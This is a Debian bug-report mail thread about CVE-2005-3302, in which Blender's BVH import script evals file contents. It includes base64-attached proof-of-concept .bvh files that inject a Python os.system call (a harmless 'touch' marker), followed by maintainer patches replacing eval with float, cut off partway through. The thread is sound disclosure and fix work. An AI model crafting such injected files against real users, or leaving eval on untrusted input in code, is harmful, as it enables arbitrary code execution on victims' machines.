Your message dated Wed, 16 Nov 2005 15:54:07 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution
when importing a .bvh file
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 30 Sep 2005 10:35:40 +0000
>From [EMAIL PROTECTED] Fri Sep 30 03:35:40 2005
Return-path: <[EMAIL PROTECTED]>
Received: from smtp106.mail.sc5.yahoo.com [66.163.169.226]
by spohr.debian.org with smtp (Exim 3.36 1 (Debian))
id 1ELIEu-0002iM-00; Fri, 30 Sep 2005 03:35:40 -0700
Received: (qmail 97672 invoked from network); 30 Sep 2005 10:35:39 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=yahoo.es;
h=Received:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer;
b=4wYOFP+EotJRumRWsjkVCPy/fSrk2JymO2baE+VDx6qnPOREQq1RDRHIr3W5iKJQgDf+ooa1dWCuIsMALRkC29cmac+LIdFOCXKBLdBr32U0lQoDil4Htq2qsST6rwurAcoxOtqxJzK9K6Fuy6tOe0s/yLkPpT2SreYXP4u82hA=
;
Received: from unknown (HELO ?192.168.1.5?) ([EMAIL PROTECTED] with plain)
by smtp106.mail.sc5.yahoo.com with SMTP; 30 Sep 2005 10:35:38 -0000
Subject: blender: Arbitrary code execution when importing a .bvh file
From: Joxean Koret <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="=-3gjzVCLQTlWu2kr0pk8a"
Date: Fri, 30 Sep 2005 12:51:35 +0200
Message-Id: <[EMAIL PROTECTED]>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.4
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level:
X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no
version=2.60-bugs.debian.org_2005_01_02
--=-3gjzVCLQTlWu2kr0pk8a
Content-Type: multipart/mixed; boundary="=-HbkGIVJARM52mmemKKWz"
--=-HbkGIVJARM52mmemKKWz
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Subject: blender: Arbitrary code execution when importing a .bvh file
Package: blender
Version: 2.36-1
Severity: grave
Justification: user security hole
The bvh_import.py script supplied with the current Debian Stable and (I
think) unstable versions of Blender is vulnerable to arbitrary code
execution.
The problem was corrected at 2005/01/22 in the CVS but the main package=20
doesn't come with the fixed script.
Attached goes the e-mail sended to the Blender people, one
working exploit to test the vulnerability under Debian, and 2 proof of
concepts.
Regards,
Joxean Koret
-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=3DISO-8859-15)
Versions of packages blender depends on:
ii gettext [libg 0.14.4-2 GNU Internationalization
utilities
ii libc6 2.3.2.ds1-22 GNU C Library: Shared
libraries an
ii libfreetype6 2.1.7-2.4 FreeType 2 font engine,
shared lib
ii libgcc1 1:3.4.3-13 GCC support library
ii libjpeg62 6b-10 The Independent JPEG
Group's JPEG=20
ii libopenal0 0.2004090900-1.1 OpenAL is a portable
library for 3
ii libpng12-0 1.2.8rel-1 PNG library - runtime
ii libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii libstdc++5 1:3.3.5-13 The GNU Standard C++
Library v3
ii libx11-6 4.3.0.dfsg.1-14 X Window System protocol
client li
ii python2.3 2.3.5-4 An interactive high-level
object-o
ii xlibmesa-gl [ 4.3.0.dfsg.1-14 Mesa 3D graphics library
[XFree86]
ii xlibmesa-glu 4.3.0.dfsg.1-14 Mesa OpenGL utility library
[XFree
ii xlibs 4.3.0.dfsg.1-14 X Keyboard Extension (XKB)
configu
ii zlib1g 1:1.2.2-4.sarge.2 compression library -
runtime
-- no debconf information
--=-HbkGIVJARM52mmemKKWz
Content-Disposition: attachment; filename=exploit.bvh
Content-Type: text/plain; name=exploit.bvh; charset=ISO-8859-15
Content-Transfer-Encoding: base64
SElFUkFSQ0hZDQpST09UIEpveGVhbg0Kew0KICBPRkZTRVQgX19pbXBvcnRfXygnb3MnKS5zeXN0
ZW0oJ3RvdWNoJytjaHIoMzIpKycvdG1wL2J2aF9pbXBvcnRfZXhwbG9pdCcpICAwLjAwMDAwMCAg
MC4wMDAwMDAgDQp9DQpNT1RJT04NCkZyYW1lczogMjUwDQpGcmFtZSBUaW1lOiAwLjMzMzMwMCAN
Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K
DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN
Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K
DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN
Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K
DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN
Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K
DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN
Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQo=
--=-HbkGIVJARM52mmemKKWz
Content-Disposition: attachment; filename=first.mail.txt
Content-Type: text/plain; name=first.mail.txt; charset=ISO-8859-15
Content-Transfer-Encoding: base64
SGkhDQoNCglJIGhhdmUgYmVlbiBmb3VuZCBhIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgaW4gQmxl
bmRlciB0aGF0IGFsbG93cyB0bw0KZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSB3aGVuIHRyeWluZyB0
byBpbXBvcnQgYSAuYnZoIGZpbGUuIFRoZSBwcm9ibGVtIGlzIHRoZQ0KZm9sbG93aW5nOg0KDQoJ
VGhlIHZ1bG5lcmFibGUgbW9kdWxlIGlzIGEgcHl0aG9uIHBsdWdpbi4gVGhpcyBwbHVnaW4gcGFy
c2VzIHRoZSAuYnZoDQpmaWxlcyBhbmQgY3JlYXRlcyB0aGUgY29ycmVzcG9uZGllbnQgb2JqZWN0
cyBmb3IgQmxlbmRlci4gVGhlIHByb2JsZW0gaXMgaW4gdGhlDQpmaWxlcyBidmhfaW1wb3J0LnB5
IGFuZCBidmhfZXhwb3J0LnB5IGJ1dCBpdCBpcyAicHJlc3VtYWJseSIgb25seSBleHBsb2l0YWJs
ZSANCndoZW4gaW1wb3J0aW5nIC5idmggZmlsZXMsIG5vdCB3aGVuIGV4cG9ydGluZy4NCg0KCVRh
a2luZyBhIGxvb2sgdG8gdGhlIGJ2aF9pbXBvcnQucHkgZmlsZSBJIGhhdmUgYmVlbiBmb3VuZCB2
YXJpb3VzIHB5dGhvbiANCiJldmFsIiBjYWxscyBhcm91bmQgdGhlIGxpbmVzIDMzNCBhbmQgMzcw
LiBUaGUgcHl0aG9uICJldmFsIiBjYWxsIGlzIEVWSUwgYW5kIA0Kc2hvdWxkIG5vdCBiZSB1c2Vk
IG5vcm1hbGx5LiBBbnl3YXksIHRoZSBzb3VyY2UgY29kZSBvZiB0aGUgcGx1Z2lucyBsb29rcyBh
cw0KZm9sbG93czoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KMzIxICAgY2hhbm5l
bExpc3QgPSBbXQ0KMzIyICAgY2hhbm5lbEluZGV4ID0gLTENCjMyMyAgIA0KMzI0ICAgbGluZUlk
eCA9IDEgIyBBbiBpbmRleCBmb3IgdGhlIGZpbGUuDQozMjUgICB3aGlsZSBsaW5lSWR4IDwgbGVu
KGxpbmVzKSAtMToNCjMyNiAgICAgIy4uLg0KMzI3ICAgICBpZiBsaW5lc1tsaW5lSWR4XVswXSA9
PSAnUk9PVCcgb3IgbGluZXNbbGluZUlkeF1bMF0gPT0gJ0pPSU5UJzoNCjMyOCAgICAgICAjIE1B
WSBORUVEIFRPIFNVUFBPUlQgTVVMVElQTEUgUk9PVCdzIEhFUkUhISEsIFN0aWxsIHVuc3VyZSB3
ZWF0aGVyIG11bHRpcGxlIHJvb3RzIGFyZSBwb3NzaWJsZS4/Pw0KMzI5DQozMzAgICAgICAgcHJp
bnQgbGVuKHBhcmVudCkgKiAnICAnICsgJ25vZGU6JyxsaW5lc1tsaW5lSWR4XVsxXSwnIHBhcmVu
dDonLHBhcmVudFstMV0NCjMzMSAgICAgICANCjMzMiAgICAgICBuYW1lID0gbGluZXNbbGluZUlk
eF1bMV0NCjMzMyAgICAgICBsaW5lSWR4ICs9IDIgIyBJbmNyaW1lbnQgdG8gdGhlIG5leHQgbGlu
ZSAoT2Zmc2V0KQ0KMzM0ICAgICAgIG9mZnNldCA9ICggZXZhbChsaW5lc1tsaW5lSWR4XVsxXSks
IGV2YWwobGluZXNbbGluZUlkeF1bMl0pLCBldmFsKGxpbmVzW2xpbmVJZHhdWzNdKSApDQozMzUg
ICAgICAgbGluZUlkeCArPSAxICMgSW5jcmltZW50IHRvIHRoZSBuZXh0IGxpbmUgKENoYW5uZWxz
KQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQoJQXMgd2UgY2FuIHNlZSB0aGUgc2Vj
b25kIChsaW5lc1tsaW5lSWR4XVsxXSksIHRoaXJkIChsaW5lc1tsaW5lSWR4XVsyXSkgYW5kDQpm
b3VydGggd29yZCBvZiB0aGUgcGFyc2VkIGxpbmUgd2lsbCBiZSBldmFsZWQgdG8gZ2V0IHRoZSBY
LCBZIGFuZCBaIHZhbHVlcyBvZiB0aGUgDQpvYmplY3QgYnV0LCB3aGF0IGFib3V0IGlmIHRoaXMg
aXMgbm90IGEgbnVtYmVyPyBJZiBpdCdzIG1hbGljaW91cyBweXRob24gY29kZT8gT25lDQpzYW1w
bGU6DQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCjAxIEhJRVJBUkNIWQ0KMDIgUk9P
VCBuYW1lIDEgMg0KMDMgDQowNCAxIDIgMyA0DQowNSAxIF9faW1wb3J0X18oJ29zJykuc3lzdGVt
KCd0b3VjaCcrY2hyKDMyKSsnL3RtcC9idmhfaW1wb3J0X2V4cGxvaXQnKSAzIDQNCjA2IA0KMDcg
DQowOCANCjA5IA0KMTANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KCVRoZSBzZWNv
bmQgd29yZCBvZiB0aGUgNXRoIGxpbmUgaXMgYSBjb3JyZWN0IGZyYWdtZW50IG9mIHB5dGhvbiBj
b2RlLiBXaGVuIHRoZQ0KcGx1Z2luIHRyaWVzIHRvIHBhcnNlIHRoZSAuYnZoIGZpbGUgdGhlIGNv
ZGUgX19pbXBvcnRfXygnb3MnKS4uLiwgd2lsbCBiZSBldmFsZWQgYW5kIA0KdGhlIGZpbGUgL3Rt
cC9idmhfaW1wb3J0X2V4cGxvaXQgd2lsbCBiZSBjcmVhdGVkLiBCdXQsIEkgZG9uJ3Qga25vd24g
d2h5LCB0aGlzIHByb29mDQpvZiBjb25jZXB0IGRvZXNuJ3Qgd29yayBvbiBteSBtYWNoaW5lIHNv
IEkgY3JlYXRlZCBhIHZhbGlkIGV4cGxvaXQgdGhhdCBCbGVuZGVyIGltcG9ydHMNCndpdGhvdXQg
YW55IGVycm9yIGFuZC9vciB3YXJuaW5ncyBhbmQgY3JlYXRlcyB0aGUgZmlsZSAvdG1wL2J2aF9p
bXBvcnRfZXhwbG9pdC4gQXR0YWNoZWQNCmdvZXMgYSB2YWxpZCBleHBsb2l0IGNhbGxlZCBleHBs
b2l0LmJ2aCB0aGF0IGNyZWF0ZXMgdGhlIGZpbGUgL3RtcC9idmhfaW1wb3J0X2V4cGxvaXQuDQoN
Ck5PVEU6IFRoaXMgdnVsbmVyYWJpbGl0eSBpcyBleHBsb2l0YWJsZSBpbiBhbnkgb2YgdGhlIEJs
ZW5kZXIgc3VwcG9ydGVkIHBsYXR0Zm9ybXMuDQoNClJlZ2FyZHMsDQpKb3hlYW4gS29yZXQ=
--=-HbkGIVJARM52mmemKKWz
Content-Disposition: attachment; filename=poc1.bvh
Content-Type: text/plain; name=poc1.bvh; charset=ISO-8859-15
Content-Transfer-Encoding: base64
SElFUkFSQ0hZDQpFbmQgU2l0ZQ0KDQoxIF9faW1wb3J0X18oJ29zJykuc3lzdGVtKCd0b3VjaCcr
Y2hyKDMyKSsnL3RtcC9idmhfaW1wb3J0X2V4cGxvaXQnKSAzIDQ=
--=-HbkGIVJARM52mmemKKWz
Content-Disposition: attachment; filename=poc2.bvh
Content-Type: text/plain; name=poc2.bvh; charset=ISO-8859-15
Content-Transfer-Encoding: base64
SElFUkFSQ0hZDQpST09UIG5hbWUgMSAyDQoNCjEgMiAzIDQNCjEgX19pbXBvcnRfXygnb3MnKS5z
eXN0ZW0oJ3RvdWNoJytjaHIoMzIpKycvdG1wL2J2aF9pbXBvcnRfZXhwbG9pdCcpIDMgNA==
--=-HbkGIVJARM52mmemKKWz--
--=-3gjzVCLQTlWu2kr0pk8a
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
digitalmente
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBDPRi3U6rFMEYDrlERAvz3AJ9cnmsKHbR83dG3Pe0PEZtBe4+3UgCgmVT3
nDFtJMVrV537iy05hubq1Zg=
=EApH
-----END PGP SIGNATURE-----
--=-3gjzVCLQTlWu2kr0pk8a--
______________________________________________
Renovamos el Correo Yahoo!
Nuevos servicios, más seguridad
http://correo.yahoo.es
---------------------------------------
Received: (at 330895-done) by bugs.debian.org; 16 Nov 2005 14:54:16 +0000
>From [EMAIL PROTECTED] Wed Nov 16 06:54:16 2005
Return-path: <[EMAIL PROTECTED]>
Received: from relay2.uni-heidelberg.de ([129.206.210.211])
by spohr.debian.org with esmtp (Exim 4.50)
id 1EcOfw-0007My-7n
for [EMAIL PROTECTED]; Wed, 16 Nov 2005 06:54:16 -0800
Received: from ix.urz.uni-heidelberg.de (popix.urz.uni-heidelberg.de
[129.206.119.235])
by relay2.uni-heidelberg.de (8.12.10/8.12.10) with ESMTP id
jAGEsPM0011503;
Wed, 16 Nov 2005 15:54:25 +0100 (MET)
Received: from extmail.urz.uni-heidelberg.de (extmail.urz.uni-heidelberg.de
[129.206.100.140])
by ix.urz.uni-heidelberg.de (8.8.8/8.8.8) with ESMTP id PAA5955818;
Wed, 16 Nov 2005 15:54:11 +0100
Received: from live (p54A713D9.dip0.t-ipconnect.de [84.167.19.217])
(authenticated bits=0)
by extmail.urz.uni-heidelberg.de (8.13.4/8.13.1) with ESMTP id
jAGEsiuI014072
(version=TLSv1/SSLv3 cipher=AES256-SHA bits=256 verify=NO);
Wed, 16 Nov 2005 15:54:45 +0100
Received: from fernst by live with local (Exim 4.54)
id 1EcOfo-00014q-Eg; Wed, 16 Nov 2005 15:54:08 +0100
Date: Wed, 16 Nov 2005 15:54:07 +0100
To: [EMAIL PROTECTED]
Subject: Re: Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when
importing a .bvh file
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="rCIC/fLAoyeCowUM"
Content-Disposition: inline
In-Reply-To: <[EMAIL PROTECTED]>
User-Agent: Mutt/1.5.9i
From: Florian Ernst <[EMAIL PROTECTED]>
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level:
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
--rCIC/fLAoyeCowUM
Content-Type: multipart/mixed; boundary="4XGXW98AkZ9Jbbyi"
Content-Disposition: inline
--4XGXW98AkZ9Jbbyi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Package: blender
Version: 2.37a-1
Dear Security Team,
as this package's maintainer hasn't shown any visible reaction to this
issue I now try to take care...
On Fri, 30 Sep 2005 12:51:35 +0200, Joxean Koret wrote:
> The bvh_import.py script supplied with the current Debian Stable and (I
> think) unstable versions of Blender is vulnerable to arbitrary code
> execution.
I can confirm that this particular vulnerability could trick a user
into executing arbitrary commands with his rights. All an attacker has
to do is to provide a specially crafted bvh file (used for Motion
Capture data) for the user to import into a blender scene, and all
commands contained therein will be executed in the user's environment.
The demo exploit attached to Joxean's mail works under blender-2.36.
Oldstable (2.23-0.1) isn't affected as it shipped a version of blender
that didn't include this script yet (and was in non-free).
Stable (2.36-1) is affected, I've attached two patches that remove all
'eval's in the script, which in fact basically is what upstream did.
The first patch (CVE-2005-3302_upstream_dpatch.diff) essentially
contains what upstream did to resolve this issue, while the second
patch (CVE-2005-3302_dpatch.diff) contains what I considered to be a
minimal set of changes to remove this particular vulnerability.
Please see
<http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scripts/bvh_import.py.diff?r1=1.4&r2=1.5&cvsroot=bf-blender>
for upstream details.
I can confirm that these changes prevent the exploit of this
vulnerability, tested on both blender-2.36 and 2.37a
Testing isn't affected anymore as blender has been removed from
Testing due to general bugginess.
Unstable was partially affected: while 2.37a-1 already included the
upstream fix for this problem this version hadn't been built on all
archs due to bug#333958. However, this FTBFS has been resolved as of
2.37a-1.1, so right now all versions currently present in Unstable are
_not_ vulnerable. Consequently I now close this bug for the
corresponding version in Unstable with this mail.
Please issue an update for Stable when you think it is due time.
HTH,
Flo
--4XGXW98AkZ9Jbbyi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="CVE-2005-3302_upstream_dpatch.diff"
Content-Transfer-Encoding: quoted-printable
diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li=
st
--- blender-2.36/debian/patches/00list
+++ blender-2.36/debian/patches/00list
@@ -2,0 +3 @@
+03_fix_arbitrary_code_execution_in_bvh_import.py
diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog
--- blender-2.36/debian/changelog
+++ blender-2.36/debian/changelog
@@ -1,3 +1,12 @@
+blender (2.36-1sarge1) stable-security; urgency=3Dhigh
+
+ * patch release/scripts/bvh_import.py to use float instead of eval by
+ adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch,
+ thus preventing arbitrary code execution when importing a .bvh file;
+ for reference, this is CVE-2005-3302 - closes: #330895
+
+ -- Florian Ernst <[EMAIL PROTECTED]> Wed, 16 Nov 2005 15:03:10 +0100
+
blender (2.36-1) unstable; urgency=3Dhigh
=20
* The "Back From The Gig" release.
only in patch2:
unchanged:
--- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh=
_import.py.dpatch
+++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo=
rt.py.dpatch
@@ -0,0 +1,67 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns=
t <[EMAIL PROTECTED]>
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: Fix for CVE-2005-3302, see bug#330895 and
+## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc=
ripts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender>
+## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc=
ripts/bvh_import.py.diff?r1=3D1.6&r2=3D1.7&cvsroot=3Dbf-blender>
+
[EMAIL PROTECTED]@
+diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea=
se/scripts/bvh_import.py
+--- blender-2.36~/release/scripts/bvh_import.py 2004-11-07
17:31:13.000000=
000 +0100
++++ blender-2.36/release/scripts/bvh_import.py 2005-11-16 15:08:35.0000000=
00 +0100
+@@ -331,7 +331,7 @@
+ =20
+ name =3D lines[lineIdx][1]
+ lineIdx +=3D 2 # Incriment to the next line (Offset)
+- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+ lineIdx +=3D 1 # Incriment to the next line (Channels)
+ =20
+ # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,=
Zrotation]
+@@ -367,7 +367,7 @@
+ # Account for an end node
+ if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'=
: # There is somtimes a name afetr 'End Site' but we will ignore it.
+ lineIdx +=3D 2 # Incriment to the next line (Offset)
+- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+ makeEnd(parent, prefix, offset)
+=20
+ # Just so we can remove the Parents in a uniform way- End end never=
has kids
+@@ -431,14 +431,32 @@
+ if debug: Blender.Redraw()=20
+ while obIdx < len(objectList) -1:
+ if channelList[obIdx][0] !=3D -1:
+- objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]])))
++ VAL0=3Dlines[lineIdx][channelList[obIdx][0]]
++ if VAL0.find('.')=3D=3D-1:
++ VAL0=3DVAL0[:len(VAL0)-6]+'.'+VAL0[-6:]
++ objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * float(VAL0)))
+ if channelList[obIdx][1] !=3D -1:
+- objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]])))
++ VAL1=3Dlines[lineIdx][channelList[obIdx][1]]
++ if VAL1.find('.')=3D=3D-1:
++ VAL1=3DVAL1[:len(VAL1)-6]+'.'+VAL1[-6:]
++ objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * float(VAL1)))
+ if channelList[obIdx][2] !=3D -1:
+- objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]])))
++ VAL2=3Dlines[lineIdx][channelList[obIdx][2]]
++ if VAL2.find('.')=3D=3D-1:
++ VAL2=3DVAL2[:len(VAL2)-6]+'.'+VAL2[-6:]
++ objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * float(VAL2)))
+ =20
+ if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] !=
=3D '-1' or channelList[obIdx][5] !=3D '-1':
+- x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx=
][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch=
annelList[obIdx][5]]))
++ VAL3=3Dlines[lineIdx][channelList[obIdx][3]]
++ if VAL3.find('.')=3D=3D-1:
++ VAL3=3DVAL3[:len(VAL3)-6]+'.'+VAL3[-6:]
++ VAL4=3Dlines[lineIdx][channelList[obIdx][4]]
++ if VAL4.find('.')=3D=3D-1:
++ VAL4=3DVAL4[:len(VAL4)-6]+'.'+VAL4[-6:]
++ VAL5=3Dlines[lineIdx][channelList[obIdx][5]]
++ if VAL5.find('.')=3D=3D-1:
++ VAL5=3DVAL5[:len(VAL5)-6]+'.'+VAL5[-6:]
++ x, y, z =3D eulerRotate(float(VAL3), float(VAL4), float(VAL5))
+ objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren=
tFrame, x))
+ objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren=
tFrame, y))
+ objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren=
tFrame, z))
--4XGXW98AkZ9Jbbyi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="CVE-2005-3302_dpatch.diff"
Content-Transfer-Encoding: quoted-printable
diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li=
st
--- blender-2.36/debian/patches/00list
+++ blender-2.36/debian/patches/00list
@@ -2,0 +3 @@
+03_fix_arbitrary_code_execution_in_bvh_import.py
diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog
--- blender-2.36/debian/changelog
+++ blender-2.36/debian/changelog
@@ -1,3 +1,15 @@
+blender (2.36-1sarge1) stable-security; urgency=3Dhigh
+
+ * patch release/scripts/bvh_import.py to use float instead of eval by
+ adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch,
+ thus preventing arbitrary code execution when importing a .bvh file;
+ this fix differs from the changes in
+ <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scrip=
ts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender>
+ in that it doesn't provide the new checks introduced therein;
+ for reference, this is CVE-2005-3302 - closes: #330895
+
+ -- Florian Ernst <[EMAIL PROTECTED]> Wed, 16 Nov 2005 14:45:57 +0100
+
blender (2.36-1) unstable; urgency=3Dhigh
=20
* The "Back From The Gig" release.
only in patch2:
unchanged:
--- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh=
_import.py.dpatch
+++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo=
rt.py.dpatch
@@ -0,0 +1,47 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns=
t <[EMAIL PROTECTED]>
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: Fix for CVE-2005-3302, see bug#330895
+
[EMAIL PROTECTED]@
+diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea=
se/scripts/bvh_import.py
+--- blender-2.36~/release/scripts/bvh_import.py 2004-11-07
17:31:13.000000=
000 +0100
++++ blender-2.36/release/scripts/bvh_import.py 2005-11-02 13:36:01.0000000=
00 +0100
+@@ -331,7 +331,7 @@
+ =20
+ name =3D lines[lineIdx][1]
+ lineIdx +=3D 2 # Incriment to the next line (Offset)
+- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+ lineIdx +=3D 1 # Incriment to the next line (Channels)
+ =20
+ # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,=
Zrotation]
+@@ -367,7 +367,7 @@
+ # Account for an end node
+ if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'=
: # There is somtimes a name afetr 'End Site' but we will ignore it.
+ lineIdx +=3D 2 # Incriment to the next line (Offset)
+- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+ makeEnd(parent, prefix, offset)
+=20
+ # Just so we can remove the Parents in a uniform way- End end never=
has kids
+@@ -431,14 +431,14 @@
+ if debug: Blender.Redraw()=20
+ while obIdx < len(objectList) -1:
+ if channelList[obIdx][0] !=3D -1:
+- objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]])))
++ objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * float(lines[lineIdx][channelList[obIdx][0]])))
+ if channelList[obIdx][1] !=3D -1:
+- objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]])))
++ objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * float(lines[lineIdx][channelList[obIdx][1]])))
+ if channelList[obIdx][2] !=3D -1:
+- objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]])))
++ objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
